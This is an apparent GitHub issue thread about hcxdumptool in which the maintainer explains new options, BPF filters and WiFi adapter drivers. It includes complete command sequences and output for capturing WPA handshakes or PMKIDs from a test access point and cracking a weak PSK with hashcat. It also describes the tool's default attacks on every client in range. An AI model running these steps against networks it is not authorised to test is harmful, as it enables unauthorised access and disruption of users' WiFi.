Comments (114)
This options (--filterlist_ap=my filter.txt --filternode=3 or --enable_status=1) have been removed since v6.3.0.
From now on, it is mandatory to add a Berkeley Packet Filter (BPF) that do the entire filtering.
More information is here:
#343
#330
as well as here:
$ hcxdumptool --help
and in changelog:
https://github.com/ZerBea/hcxdumptool/blob/master/changelog#L83
Closed,this report here, because this changes are wanted and announced.
from hcxdumptool.
Option "enable_status=1" has been replaced by "rds=1" and the slow waterfall display has been replaced by a fast split screen.
Options "filterlist_ap=my filter.txt and "filternode=3" have been replaced by "bpf=filter.bpfc".
How to build the Berkeley Packet Filter is explained in help.
from hcxdumptool.
A typical command line (scan all frequencies supported by the interface) is
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F
In case of filtering:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F --bpf=filter.bpf
In case if using a single channel, e.g. channel 1:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -c 1a
Scan only main channel 1, 6 and 11 on 2.4GHz band:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1
Or any other combination of the new options.
Please take a look at help to get an overview of all options and the legend of the new split screen.
from hcxdumptool.
Quick follow up question. On nethunter and kalilinux pc, any command with a "--" before it throws "unrecognised option " example --disable_deauthentication or --do_rcascan
from hcxdumptool.
This option "--do_rcascan" has been replaced by "--rcascan=active".
If you don't change that, you'll get an ERROR:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --do_rcascan
hcxdumptool: unrecognized option '--do_rcascan'
hcxdumptool 6.3.1-69-g532cc54 (C) 2023 by ZeroBeat
usage: hcxdumptool -h for help
Running the new style, everything should be fine:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --rcascan=active
Requesting physical interface capabilities. This may take some time.
Please be patient...
or to scan all frequencies:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --rcascan=active -F
Requesting physical interface capabilities. This may take some time.
Please be patient...
from hcxdumptool.
Also attack.bpf is empty. Use command hcxdumptool -m wlan0
tcpdump -i wlan0 wlan addr 11:4C:69:08:50:BB -ddd > attack.bpf writes an empty file.
from hcxdumptool.
Has the man page not been updated yet
from hcxdumptool.
Command line is wrong.
Your command line:
$ sudo tcpdump -i wlan0 wlan addr 11:4C:69:08:50:BB -ddd > attack.bpf
tcpdump: can't parse filter expression: syntax error
correct command line:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd > attack.bpf
$ cat attack.bpf
16
48 0 0 3
100 0 0 8
7 0 0 0
48 0 0 2
76 0 0 0
2 0 0 0
7 0 0 0
80 0 0 0
84 0 0 12
21 5 0 4
64 0 0 18
21 0 3 1762152635
72 0 0 16
21 0 1 4428
6 0 0 262144
6 0 0 0
from hcxdumptool.
The default man page of hcxdumptool points to "--help":
https://github.com/ZerBea/hcxdumptool/blob/master/man/hcxdumptool.1
It doesn't need an update.
If your manpage is different it is not created by me.
from hcxdumptool.
Sorry in the command line I do add "addr1"
Also "man hcxdumptool" brings a whole new list of comands
from hcxdumptool.
Not my manpage.
from hcxdumptool.
Arch Linux don't need a manpage (like Debian). So it is not installed by default and makefile doesn't have an entry to install this manpage.
https://github.com/ZerBea/hcxdumptool/blob/master/Makefile
Maybe you have an old manpage (if you have not uninstaqlled the old version before you have installed the new verion) or a manpage created by a package maintainer.
from hcxdumptool.
Ahhh so confusing lol.
New error.
Tcpdump: eithernet address used in non-ether expression. After trying to make bpf file.
from hcxdumptool.
Forget last. My mistake.
from hcxdumptool.
tcpdump will show this error if the interface is not in monitor mode and not up.
from hcxdumptool.
If the target AP is not on channel 1a, 6a or 11a, don't forget to set the operation channel of the AP by option "-c" or scan all frequencies by option "-F".
Default scan is 1a, 6a and 11a, only.
from hcxdumptool.
I didn't insert wlan before addr3 just -I wlan0 addr3
from hcxdumptool.
Ok
from hcxdumptool.
My chanel is 11 so "-c 11a " is for 2.4ghz
from hcxdumptool.
Please also notice that running this filter:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd > attack.bpf
You'll get a warning (missing frames) by hcxpcapngtool when converting the dump file to hc22000 format because undirected proberequest frames are filtered out, too.
To avoid that, add a BROADCAST MAC to your filter:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf
Additional you can tell hcxdumptool to terminate if you got a PMKID or a handshake:
--exitoneapol=<type> : exit on first EAPOL occurrence:
bitmask:
1 = PMKID
2 = EAPOL M2
4 = EAPOL M3
from hcxdumptool.
Would this adaptor work Alfa Network AWUS036AC Long-Range Dual-Band chipset RTL8812AU both bands?
Is there a difference between addr1 and addr3?
from hcxdumptool.
The RTL8812AU driver is not part of the stock Linux kernel.
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/drivers/net/wireless/realtek?h=v6.5.8
and you need to install a third party driver.
Please read the adapter section of README.md (recommended and not recommended chipsets/drivers).
Please also read this:
morrownr/USB-WiFi#314
There is a difference between addr1, addr2, addr3 and add4:
addr1 = to
addr2 = from
addr3 = BSSID
addr4 = wireless distribution systems
https://www.geeksforgeeks.org/ieee-802-11-mac-frame/
https://www.rfwireless-world.com/Articles/WLAN-MAC-layer-protocol.html
from hcxdumptool.
Your a legend thanks so much for your help. Is there a dule band adaptor you would recomend. Currently using the tplink tl wn722n 2.4ghs.
from hcxdumptool.
Is there any other solutions to single out a specific ap to attack this dosent seem to work like you said.
from hcxdumptool.
ALFA AWUS036ACM
ALFA AWSU036ACHM
Both drivers are well maintained and part of the Linux kernel.
Both support active monitor mode.
Give me a few minutes to run a test.
from hcxdumptool.
here we go:
TP-Link TL-W722N v1:
$ lsusb
ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n
build filter:
$ sudo hcxdumptool -m wlp48s0f4u2u4
$ sudo tcpdump -i wlp48s0f4u2u4 wlan addr3 08:96:d7:98:e1:9e -ddd > attack.bpf
For this test we do not need frames addressed to BROADCAST MAC and they are filtered out.
run attack against target test AP:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --rds=1 -w tlwn722v1.pcapng -c 10a --bpf=attack.bpf
CHA LAST R 1 3 P S MAC-AP ESSID (last EAPOL on top) SCAN-FREQUENCY: 2457
-----------------------------------------------------------------------------------------
[ 10] 18:55:06 + + + + 0896d798e19e AP_7272
LAST E 2 MAC-AP-ROGUE MAC-CLIENT ESSID (last M2ROGUE on top)
-----------------------------------------------------------------------------------------
18:54:59 0896d798e19e 00e62d021987 AP_7272
282 packet(s) captured
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
31 EPB written to pcapng dumpfile
exit on sigterm
bye-bye
conver to hc22000 format:
$ hcxpcapngtool -o test.22000 tlwn722v1.pcapng
hcxpcapngtool 6.3.1-109-gac0db30 reading from tlwn722v1.pcapng...
summary capture file
--------------------
file name................................: tlwn722v1.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.5.8-arch1-1
application..............................: hcxdumptool 6.3.1-69-g532cc54
interface name...........................: wlp48s0f4u2u4
interface vendor.........................: f81a67
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 000da76303f4 (incremented on every new client)
MAC CLIENT...............................: c02250d406bb
REPLAYCOUNT..............................: 62460
ANONCE...................................: 4655d441f5e986d1c7102b72799bd537abc7a9c8dc150391bf988a2d0a8db87b
SNONCE...................................: 3c2c9d4853f5cfad58cde9c27e0aef9b0c80899f33e2664a21ea8a04c8df4464
timestamp minimum (GMT)..................: 24.10.2023 18:54:57
timestamp maximum (GMT)..................: 24.10.2023 18:54:59
duartion of the dump tool (seconds)......: 1
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 31
frames with correct FCS..................: 31
packets received on 2.4 GHz..............: 31
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 10
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 3
AUTHENTICATION (OPEN SYSTEM).............: 3
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
EAPOL messages (total)...................: 24
EAPOL RSN messages.......................: 24
EAPOLTIME gap (measured maximum msec)....: 52
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 4
EAPOL M1 messages (total)................: 18
EAPOL M2 messages (total)................: 2
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 2
EAPOL M4 messages (zeroed NONCE).........: 2
EAPOL pairs (total)......................: 4
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2457: 31
Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.
session summary
---------------
processed pcapng files................: 1
hcxpcapngtool has detected the absence of frames addressed to BROADCAST MAC and told us that (missing frames).
Try to recover the PSK:
$ hashcat -m 22000 test.22000 -a 6 12345678
hashcat (v6.2.6-812-g8a206a9c0) starting
...
12e5828236c9a5a54795dde9b2b9d0f1:0896d798e19e:00e62d021987:AP_7272:12345678
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Tue Oct 24 19:01:45 2023 (0 secs)
Time.Estimated...: Tue Oct 24 19:01:45 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 73 H/s (0.42ms) @ Accel:32 Loops:256 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 42c Fan: 0% Util: 59% Core:2835MHz Mem:10802MHz Bus:16
Started: Tue Oct 24 19:01:44 2023
Stopped: Tue Oct 24 19:01:46 2023
For this test I configured a very simple PSK 12345678 which was successful recovered by hashcat.
Conclusion:
It took only 2 seconds to perform the attack:
timestamp minimum (GMT)..................: 24.10.2023 18:54:57
timestamp maximum (GMT)..................: 24.10.2023 18:54:59
The PSK has been successful recovered.
from hcxdumptool.
Same test using a TP-LINK TL-WN722N v2/v3:
device information
$ lsusb
ID 2357:010c TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
attack using the already created filter:
$ sudo hcxdumptool -i wlp22s0f0u9u3 --rds=1 -w tlwn722v3.pcapng -c 10a --bpf=attack.bpf
CHA LAST R 1 3 P S MAC-AP ESSID (last EAPOL on top) SCAN-FREQUENCY: 2457
-----------------------------------------------------------------------------------------
[ 10] 19:09:45 + + + + 0896d798e19e AP_7272
LAST E 2 MAC-AP-ROGUE MAC-CLIENT ESSID (last M2ROGUE on top)
-----------------------------------------------------------------------------------------
19:09:43 0896d798e19e 00e62d021987 AP_7272
^C
209 packet(s) captured
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
25 EPB written to pcapng dumpfile
exit on sigterm
bye-bye
convert to hc22000:
$ hcxpcapngtool -o testv3.22000 tlwn722v3.pcapng
hcxpcapngtool 6.3.1-109-gac0db30 reading from tlwn722v3.pcapng...
summary capture file
--------------------
file name................................: tlwn722v3.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.5.8-arch1-1
application..............................: hcxdumptool 6.3.1-69-g532cc54
interface name...........................: wlp22s0f0u9u3
interface vendor.........................: 9ca2f4
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 111111300a88 (incremented on every new client)
MAC CLIENT...............................: a4a6a9dcefde
REPLAYCOUNT..............................: 64838
ANONCE...................................: 3b82ddb85e3fa8b4fd787bab084e310bec96f5fb4d008ec3f7766ecb55b69ff1
SNONCE...................................: 672a67b17e2bd2cd43e9b258b2bf066c8ecace54ba76b48c3cf2a1771a06c10c
timestamp minimum (GMT)..................: 24.10.2023 19:09:39
timestamp maximum (GMT)..................: 24.10.2023 19:09:43
duartion of the dump tool (seconds)......: 3
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 25
packets received on 2.4 GHz..............: 25
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 10
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 3
AUTHENTICATION (OPEN SYSTEM).............: 3
ASSOCIATIONREQUEST (total)...............: 1
ASSOCIATIONREQUEST (PSK).................: 1
EAPOL messages (total)...................: 19
EAPOL RSN messages.......................: 19
EAPOLTIME gap (measured maximum msec)....: 51
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 2
EAPOL M1 messages (total)................: 14
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 2
EAPOL M4 messages (zeroed NONCE).........: 2
EAPOL pairs (total)......................: 2
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2457: 25
Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.
session summary
---------------
processed pcapng files................: 1
recover the PSK:
$ hashcat -m 22000 testv3.22000 -a 3 12345678
hashcat (v6.2.6-812-g8a206a9c0) starting
...
5ad4260e96fd4d538a11545708a5bb1b:0896d798e19e:00e62d021987:AP_7272:12345678
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: testv3.22000
Time.Started.....: Tue Oct 24 19:14:11 2023 (0 secs)
Time.Estimated...: Tue Oct 24 19:14:11 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 73 H/s (0.42ms) @ Accel:64 Loops:256 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 37c Fan: 0% Util: 75% Core:2850MHz Mem:10802MHz Bus:16
Started: Tue Oct 24 19:14:10 2023
Stopped: Tue Oct 24 19:14:12 2023
PSK has been successful recovered by hashcat.
from hcxdumptool.
TP-LINK TLWN722Nv1 and v2/v3 driver overview:
$ hcxdumptool -L
Requesting physical interface capabilities. This may take some time.
Please be patient...
available wlan devices:
phy idx hw-mac virtual-mac m ifname driver (protocol)
---------------------------------------------------------------------------------------------
6 9 9ca2f4093af0 9ca2f4093af0 + wlp22s0f0u9u3 rtl8xxxu (NETLINK)
7 10 f81a67077d0e f81a67077d0e + wlp22s0f0u9u1 ath9k_htc (NETLINK)
* active monitor mode available
+ monitor mode available
- no monitor mode available
bye-bye
from hcxdumptool.
Please notice:
It is mandatory that you know which services on your system are configured and running.
It is also mandatory that you stop them if they take access to the device.
All test are done running Arch Linux on x86-64 systems (RYZEN platform) and Raspbian OS Lite on armv6 systems (Raspberry Pi platform).
Both, Arch Linux and Raspbian are installed and configured by hand. There are absolutely no unwanted services running!
from hcxdumptool.
Bit of a problem with or without -c 11a on the scan screen it puts me on to chanel 8
from hcxdumptool.
That is more related to the hardware and caused by overlapped channels.
Take a look at this picture:
https://technologyuk.net/telecommunications/telecom-principles/images/telecom-principles-0075.gif
If the center frequency is on 2.437 GHz (channel 6), you receive signals from channel 4, 5 and 7, 8, too.
That depend on the bandwidth and the proximity to the transmitter it can be less or more.
There are explanations in www, e.g.:
https://electronics.stackexchange.com/questions/155643/why-do-wifi-channels-overlap
https://serverfault.com/questions/152920/what-happens-when-wifi-channels-overlap
https://witestlab.poly.edu/blog/ieee-802-11-wlans-using-partially-overlapped-channels/
BTW:
The actual operation frequency is displayed on the top right corner of the status display.
from hcxdumptool.
Usually an AP announce (IE-TAG) its operating frequency inside the BEACON:
Tag: DS Parameter set: Current Channel: 1
Tag Number: DS Parameter set (3)
Tag length: 1
Current Channel: 1
If hcxdumptool's operating channel is e.g. channel 3 and it receive a signal from an overlapped channel (e.g. channel 1) it evaluate this tag and show the real operating frequency of the signal.
Top right corner: hcxdumptool's operating frequency (2422 MHz == channel 3)
Column CHA: operating frequency of the received AP (from IE-TAG).
CHA LAST R 1 3 P S MAC-AP ESSID (last seen on top) SCAN-FREQUENCY: 2422
-----------------------------------------------------------------------------------------
[ 1] 16:22:00 ...............................
hcxdumptool will not attack the target if it is not on the same frequency/channel.
from hcxdumptool.
BTW:
hcxpcapngtool print both information after reading a pcapng dump file:
BEACON on 2.4 GHz channel (from IE_TAG)..: 1 2 3 4 5 6 7 8 9 11 13
BEACON on 5/6 GHz channel (from IE_TAG)..: 36 40 44
...
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2412: 1833 2417: 30 2422: 4 2427: 32
2432: 216 2437: 1280 2442: 35 2447: 312
2452: 16 2457: 2 2462: 3890 2467: 7
2472: 8 5180: 27 5200: 11 5220: 20
5240: 4
from hcxdumptool.
If you take a look at the frequency statistics from radio tap header, you can imagine why hcxdumptool scans channels 1a (2412), 6a (2437) and 11a (2462) by default only.
from hcxdumptool.
Cool thanks will research it. All working on kalilinux and nethunter.
from hcxdumptool.
What dose hcxdumptool do that it must be used in a safe environment?
from hcxdumptool.
I guess you mean this:
BPF is unset! Make sure hcxdumptool is running in a 100% controlled environment!
Simply explained: hcxdumptool is an angry and hungry beast - by default it attacks everything
But it can be completely controlled by a BPF and by its options and it's up to the user to control it.
from hcxdumptool.
But what dose it do by default without a bpf filter to make it such a hungry beast.
from hcxdumptool.
- Capture all EAPOL (that include EAP hashes) hashes.
- REASSOCIATE EVERY connected CLIENT and request all EAPOL M2.
- Allow not connected CLIENTs to connect and request all EAPOL M2.
- REQUEST EAP-IDs.
- REQUEST PMKIDs.
on every WPA-PSK system (APs and CLIENTs) in range.
from hcxdumptool.
Dose it deauthenticate clients from ap to make them reconnect to get handshakes?
from hcxdumptool.
DEAUTHENTICATION and DISASSOCIATION attacks (old school) are implemented, too.
State of the art APs and CLIENTs are hardened against this ancient attacks.
Either they run Management Frame Protection (MFP) or they ignore into data sequences injected DEAUTHENTICATION/DISASSOCIATION frames.
from hcxdumptool.
Oh wow so David bombals youtube video could get you in to alot of trouble for Denial of service because he dosent use a filter.
Dose the rcascan just scan to gather information without any attacks.
from hcxdumptool.
rcascan provide 2 modes:
active scan
passive scan
Running active scan it transmit PROBEREQUESTs and count BEACONs and responses
Running passive scan it BEACONs.
All attacks are disabled running one of these modes.
Nearly every CLIENT is doing active scans to discover APs in range.
from hcxdumptool.
Ok cool. My thinking is I want to start a business testing wifi passwords with real life tests. Do you have any advice.
from hcxdumptool.
hcxdumptool runs layer 2 attacks only.
It neither runs DoS attacks nor layer 1 attacks nor attacks > layer 2.
from hcxdumptool.
Real life attacks should include all layers (1 to 7) and you have to cover them all.
https://cdn.rohde-schwarz.com/pws/dl_downloads/dl_application/application_notes/1ma69/1MA69_2e.pdf
Therefore you have to learn the entire stuff (much more than I mentioned in README.md).
Regarding 802.11, a good starting point is:
802.11® Wireless Networks: The Definitive Guide
https://www.oreilly.com/library/view/80211-wireless-networks/0596100523/index.html
Regarding Linux, a good starting point is:
https://man7.org/tlpi/
Regarding coding, I suggest C and Assembler.
https://gcc.gnu.org/onlinedocs/gcc/
from hcxdumptool.
Yeah that's alot to learn. Oh yeah I'm testing this on my home router wich I'm pretty sure is wifi6 and it works but it shouldn't work should it ?
from hcxdumptool.
hcxdumptool is state of the art and running state of the art attacks against all WPA-PSK secured NETWORKs.
Even if the AP is hardened, most of the CLIENTs are weak (and hcxdumptool show a successful attack with a "+" in the M2 column.
from hcxdumptool.
Do you mind if i put some of our conversation in a youtube video it's is all interesting and I'm sure will help others.
from hcxdumptool.
Maybe. But like Arch Linux, hcxdumptool and hcxtools are rolling release tools.
If I can do something better or faster, I'll change everything. In that case, a video will be outdated (like David*s video).
That will cause that new users run into the same problems like you did.
from hcxdumptool.
Yeah I get what you're saying. So are you the actual creator of the hcx project. Is there anything you're working on at the moment improvements or otherwise.
from hcxdumptool.
I'll say, watching a video or installing KALI by graphical installer is far, far away from handling hcxdumptool/hcxtools.
For beginners I recommend to run aircrack-ng and to learn 802.11 instead of doing
hcxdumptool -> hcpcapngtool -> hashcat/JtR
Neither hcxdumptool, nor hcxtools, nor hashcat or JtR will satisfy a newbee.
https://hashcat.net/forum/thread-11669-post-59437.html#pid59437
from hcxdumptool.
We're working on:
hashcat/hashcat#3887
openwall/john#5365
and on WPA3.
from hcxdumptool.
Yeah I'm defo a newbie. I typically don't use a kali gui as I use a nethunter phone and the gui is crap. I use hashcat on windows for the gpu speed and have used aircrack to attack capture and crack hashes. Currently I'm trying to get an alfa wifi adaptor to work on nethunter as iv got it working on kalilinux with drivers and headers but am stuck.
from hcxdumptool.
My top ranking due to excellent driver support (if not connected to an USB3 port due to USB3 problems) on Linux stock kernel:
ALFA AWUS036ACHM and ALFA AWUS036ACM
from hcxdumptool.
The kali docs for nethunter say the RTL8812AU supported in nethunter but dosent seem to work. Iv reached out to David bombal as he has a working nethunter phone and the WiFi adaptor I want to use but not had a reply. Also reached out to someone on hear as its his name that pops up in the error but again not had a response. Not everyone is as nice as you on giving help.
from hcxdumptool.
RTL8812AU is not part of the Linux stock kernel.
I guess that KALI install this driver by default:
https://github.com/aircrack-ng/rtl8812au
from hcxdumptool.
Yeah when I go to make the aircrack driver that's where the problems start. I guess it's something to do with the header but can't find a nethunter supported one it's not on the kale pool list.
from hcxdumptool.
Maybe it's a good idea to ask Christian (kimocoder).
from hcxdumptool.
In that picture I sent cyberknight777 name pops up in the error and have messaged him but no reply. Who is Christian?
from hcxdumptool.
Maintainer of the aircrack-ng Realtek drivers and some other stuff:
https://github.com/kimocoder
from hcxdumptool.
Cool thanks. No doubt I'll run into other problems lol.
from hcxdumptool.
Ok, I compiled the driver. Lookinf good, so far:
[25457.065189] usbcore: registered new interface driver rtl88XXau
[25465.063996] usb 1-9.3: new high-speed USB device number 9 using xhci_hcd
[25465.207410] usb 1-9.3: New USB device found, idVendor=7392, idProduct=a812, bcdDevice= 2.00
[25465.207414] usb 1-9.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[25465.207417] usb 1-9.3: Product: Edimax AC600 USB
[25465.207419] usb 1-9.3: Manufacturer: Realtek
[25465.207421] usb 1-9.3: SerialNumber: 00e04c000001
[25469.850382] usb 1-9.3: 88XXau 74:da:38:06:45:e7 hw_info[107]
[25469.904766] rtl88XXau 1-9.3:1.0 wlp22s0f0u9u3: renamed from wlan0
[25472.258862] mt7601u 5-2.4:1.0 wlp48s0f4u2u4: entered promiscuous mode
from hcxdumptool.
hcxdumptool is running fine, too:
$ sudo hcxdumptool -I wlp22s0f0u9u3
Requesting physical interface capabilities. This may take some time.
Please be patient...
interface information:
phy idx hw-mac virtual-mac m ifname driver (protocol)
---------------------------------------------------------------------------------------------
3 6 74da380645e7 74da380645e7 + wlp22s0f0u9u3 rtl88XXau (NETLINK)
available frequencies: frequency [channel] tx-power of Regulatory Domain: DE
2412 [ 1] 20.0 dBm 2417 [ 2] 20.0 dBm 2422 [ 3] 20.0 dBm 2427 [ 4] 20.0 dBm
2432 [ 5] 20.0 dBm 2437 [ 6] 20.0 dBm 2442 [ 7] 20.0 dBm 2447 [ 8] 20.0 dBm
2452 [ 9] 20.0 dBm 2457 [ 10] 20.0 dBm 2462 [ 11] 20.0 dBm 2467 [ 12] 20.0 dBm
2472 [ 13] 20.0 dBm 2484 [ 14] 20.0 dBm 5075 [ 15] 30.0 dBm 5080 [ 16] 30.0 dBm
5085 [ 17] 30.0 dBm 5090 [ 18] 30.0 dBm 5100 [ 20] 30.0 dBm 5120 [ 24] 30.0 dBm
5140 [ 28] 30.0 dBm 5160 [ 32] 23.0 dBm 5180 [ 36] 23.0 dBm 5200 [ 40] 23.0 dBm
5220 [ 44] 23.0 dBm 5240 [ 48] 23.0 dBm 5260 [ 52] 20.0 dBm 5280 [ 56] 20.0 dBm
5300 [ 60] 20.0 dBm 5320 [ 64] 20.0 dBm 5340 [ 68] 20.0 dBm 5360 [ 72] 30.0 dBm
5380 [ 76] 30.0 dBm 5400 [ 80] 30.0 dBm 5420 [ 84] 30.0 dBm 5440 [ 88] 30.0 dBm
5460 [ 92] 30.0 dBm 5480 [ 96] 26.0 dBm 5500 [100] 26.0 dBm 5520 [104] 26.0 dBm
5540 [108] 26.0 dBm 5560 [112] 26.0 dBm 5580 [116] 26.0 dBm 5600 [120] 26.0 dBm
5620 [124] 26.0 dBm 5640 [128] 26.0 dBm 5660 [132] 26.0 dBm 5680 [136] 26.0 dBm
5700 [140] 26.0 dBm 5720 [144] 13.0 dBm 5745 [149] 13.0 dBm 5765 [153] 13.0 dBm
5785 [157] 13.0 dBm 5805 [161] 13.0 dBm 5825 [165] 13.0 dBm 5845 [169] 13.0 dBm
5865 [173] 13.0 dBm 5885 [177] 30.0 dBm
bye-bye
from hcxdumptool.
And frame injection is working like a charm:
$ sudo hcxdumptool --rcascan=active
...
377 packet(s) captured
exit on sigterm
bye-bye
from hcxdumptool.
Yeah shame it's not as easy for kali nethunter.
from hcxdumptool.
No, that is not fair to say.
KALI is an excellent distribution ... if you are an experienced Linux user (!!!) and an experienced penetration tester(!):
"As the distribution’s developers, you might expect us to recommend that everyone should be using Kali Linux. The fact of the matter is, however, that Kali is a Linux distribution specifically geared towards professional penetration testers and security specialists, and given its unique nature, it is NOT a recommended distribution if you’re unfamiliar with Linux or are looking for a general-purpose Linux desktop distribution for development, web design, gaming, etc."
https://www.kali.org/docs/introduction/should-i-use-kali-linux/#is-kali-linux-right-for-you
But shame on all tutorials and blogs that create the impression that it is good for a Linux beginner.
from hcxdumptool.
True.
from hcxdumptool.
I'm so confused because on the kali net hunter docs page it says
from hcxdumptool.
Yet in this file it's nowhere to be found
from hcxdumptool.
Different things:
This are the installed drivers (regarding Realtek in your case mostly third party drivers and not stock Linux kernel drivers):
#355 (comment)
usually located here:
/usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/
This is the installed firmware:
#355 (comment)
usually located here:
/usr/lib/firmware/
from hcxdumptool.
Do you think I'm wasting my time trying to get the RTL8812AU driver working?
from hcxdumptool.
Once the the dependencies are satisfied, this driver:
https://github.com/aircrack-ng/rtl8812au
should compile fine.
from hcxdumptool.
$ make
make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/6.5.9-arch2-1/build M=/tmp/rtl8812au_aircrack-ng modules
make[1]: Entering directory '/usr/lib/modules/6.5.9-arch2-1/build'
CC [M] /tmp/rtl8812au_aircrack-ng/core/rtw_cmd.o
CC [M] /tmp/rtl8812au_aircrack-ng/core/rtw_security.o
CC [M] /tmp/rtl8812au_aircrack-ng/core/rtw_debug.o
CC [M] /tmp/rtl8812au_aircrack-ng/core/rtw_io.o
...
...
...
MODPOST /tmp/rtl8812au_aircrack-ng/Module.symvers
CC [M] /tmp/rtl8812au_aircrack-ng/88XXau.mod.o
LD [M] /tmp/rtl8812au_aircrack-ng/88XXau.ko
BTF [M] /tmp/rtl8812au_aircrack-ng/88XXau.ko
make[1]: Leaving directory '/usr/lib/modules/6.5.9-arch2-1/build'
---------------------------------------------------------------------------
Visit https://github.com/aircrack-ng/rtl8812au for support/reporting issues
or check for newer versions (branches) of these drivers.
---------------------------------------------------------------------------
$ zstd 88XXau.ko
88XXau.ko : 22.03% ( 4.40 MiB => 993 KiB, 88XXau.ko.zst)
$ ls *.zst
88XXau.ko.zst
A few warnings appeared during compile time, but this shouldn't be a show stopper.
Finally a git a working module: 88XXau.ko.zst
from hcxdumptool.
from hcxdumptool.
Missing dependencies:
Linux headers (matching with your kernel) are not installed.
from hcxdumptool.
Cannot find them on the Web anywhere.
from hcxdumptool.
https://forums.kali.org/showthread.php?71975-Hey!-How-to-install-linux-headers-for-nethunter
from hcxdumptool.
from hcxdumptool.
typo
wrong uname-r
correct uname -r
from hcxdumptool.
from hcxdumptool.
Old driver that depend on old kernel 4.14
from hcxdumptool.
Iv asked cyberknight777, kimcoder, aircrack-ng, yesimxev and droidkali. Don't know what to do now except give up and find a different adaptor.
from hcxdumptool.
There is no rtl8812au driver on git "cyberknight777"
https://github.com/search?q=cyberknight777+rtl8812au&type=repositories
from hcxdumptool.
Yeah it dosen exist iv spent hours looking for it.
from hcxdumptool.
You will not be able to compile this outdated driver.
from hcxdumptool.
Best give up then I guess. Is it safe assume that esfile explorer pic I sent is compatible drivers as my tilink driver is there and that worked out the box no problems?
from hcxdumptool.
Tplink*
from hcxdumptool.
Installing out of tree driver isn't easy.
Better to use a device running a stock Linux kernel driver.
If have good reasons to mention that in README.md:
No support for a third party driver which is not part of the official Linux kernel (https://www.kernel.org/)
